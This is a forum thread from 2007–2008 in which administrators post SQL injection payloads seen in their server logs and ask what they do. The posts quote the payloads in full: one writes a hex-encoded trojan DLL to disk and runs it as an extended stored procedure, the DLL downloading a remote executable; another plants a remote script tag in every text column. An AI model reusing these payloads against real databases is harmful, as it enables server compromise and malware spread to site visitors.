| Author |
Messages |
|
JohnH (guest)
 |
| 01/08/2007 7:16 PM |
 Quote
 Reply
 Alert
|
I've been getting these from an Asian IP block for the last couple days - they haven't managed to find a hole yet, but it looks like they're serious...
Here's the payload they're trying to inject:
declare @s varbinary(2048)
set @s=0x4d5a90000300000004000000ffff0000b80000000000000040000000000000000000000000000000000000000000000000000000
0000000000000000b00000000e1fba0e00b409cd21b8014ccd21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a24000000000000005df3dcfd1992b2ae1992b2ae1992b2aee5b2a0ae1892b2ae9
78da1ae1092b2ae526963681992b2ae0000000000000000504500004c010300d6a18c450000000000000000e0000e210b01050c50000000500100000000000020020000200200007002000000000010100000001000000004000000000000000400000000000000c0030000200200000000000002000000000010000010000000001000001000000000000010000000500300004a000000b80200003c000000000000000000000000000000000000000000000000000000a00300001400000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000070020000140000000000000000000000000000000000000000000000000000002e746578740000004e000000200200005000000020020000000000000000000000000000200000602e726461746100002a010000700200003001000070020000000000000000000000000000400000402e72656c6f63000016000000a003000020000000a003000000000000000000000000000040000042558bec837d0c017505b801000000c9c20c006a006a00688402001068910200106a00e8210000006a056884020010e80f0000006a00e802000000c3ccff2574020010ff2570020010ff257c02001000001603000008030000000000002e03000000000000686f74666978302
e6578650000687474703a2f2f7365696c792e73697465736c65642e636f6d2f312e6578650000000000000000f402000000000000000000002003000070020000000300000000000000000000440300007c02000000000000000000000000000000000000
000000001603000008030000000000002e0300000000000080004578697450726f6365737300940257696e45786563006b65726e656c33322e646c6c0000310055524c446f776e6c6f6164546f46696c6541000075726c6d6f6e2e646c6c000000000000d6a18c450000000082030000010000000100000001000000780300007c030000800300003202000090030000000053514c486f744669782e646c6c0073705f486f7446697800000000000000000000001400000037323c324a325e3264326a32000000000000000000000000
declare @o int
exec sp_oacreate 'adodb.stream',@o output
exec sp_oasetproperty @o,'type',2
exec sp_oamethod @o,'open'
exec sp_oamethod @o,'writetext',null,@s
declare @r int
exec sp_oacreate 'adodb.stream',@r output
exec sp_oasetproperty @r,'type',1
exec sp_oamethod @r,'open'
exec sp_oasetproperty @o,'position',2
exec sp_oamethod @o,'copyto',null,@r
exec sp_oamethod @r,'savetofile',null,'sqlhotfix.dll',2
use master
drop procedure sp_hotfix
dbcc addextendedproc ('sp_hotfix','sqlhotfix.dll') exec sp_hotfix--
Looks like they're encoding a .dll as a binary, writing it to a file, installing it as an extended stored procedure and executing it. I don't know what the .dll does, but chances are it's nothing good ;) |
|
|
|
|
Buck Woody (guest)
|
| 01/17/2007 4:39 PM |
Quote
Reply
Alert
|
You're right. The payload is a trojan that they are naming with a funny "sqlhotfix" name, which of course is bogus. Have you set up something to block them, or will you give them a honeypot to catch them?
|
|
|
|
|
Curious (guest)
|
| 06/09/2007 2:14 PM |
Quote
Reply
Alert
|
| Any chance you could post the IP block? |
|
|
|
|
I have a similar problem (guest)
|
| 11/07/2007 11:26 AM |
Quote
Reply
Alert
|
;DECLARE @S NVARCHAR(4000);SET @S=CAST(0x6400650063006C00610072006500200040006D00200076006100720063006800610072002800380030003000300029003B00730065007400200040006D003D00270027003B00730065006C00650063007400200040006D003D0040006D002B0027007500700064006100740065005B0027002B0061002E006E0061006D0065002B0027005D007300650074005B0027002B0062002E006E0061006D0065002B0027005D003D0072007400720069006D00280063006F006E007600650072007400280076006100720063006800610072002C0027002B0062002E006E0061006D0065002B002700290029002B00270027003C0073006300720069007000740020007300720063003D00220068007400740070003A002F002F0079006C00310038002E006E00650074002F0030002E006A00730022003E003C002F007300630072006900700074003E00270027003B0027002000660072006F006D002000640062006F002E007300790073006F0062006A006500630074007300200061002C00640062006F002E0073007900730063006F006C0075006D006E007300200062002C00640062006F002E007300790073007400790070006500730020006300200077006800650072006500200061002E00690064003D0062002E0069006400200061006E006400200061002E00780074007900700065003D0027005500270061006E006400200062002E00780074007900700065003D0063002E0078007400790070006500200061006E006400200063002E006E0061006D0065003D0027006E00740065007800740027003B00730065007400200040006D003D005200450056004500520053004500280040006D0029003B00730065007400200040006D003D0073007500620073007400720069006E006700280040006D002C0050004100540049004E004400450058002800270025003B00250027002C0040006D0029002C00380030003000300029003B00730065007400200040006D003D005200450056004500520053004500280040006D0029003B006500780065006300280040006D0029003B00%20AS%20NVARCHAR(4000));EXEC(@S);--
Also from an asian IP
202.108.28.168 |
|
|
|
|
sunnya (guest)
|
| 11/27/2008 9:50 PM |
Quote
Reply
Alert
|
POST /shop/NewDesign/ModelTemplate.asp HTTP/1.1
Cookie: ModelID=15845;CategoryId=2479%3BDECLARE%20@S%20VARCHAR(4000)%3BSET%20@S%3DCAST(0x4445434C415
Can any one help me , what is actually going on ? |
|
|
|
|
Chip Andrews
Posts:114
|
| 12/09/2008 5:04 PM |
Quote
Reply
Alert
|
In your case the injected code is being placed in a cookie. They are hoping that when you application processes the cookie, it will be passed to the database and executed.
|
|
|
|
|
|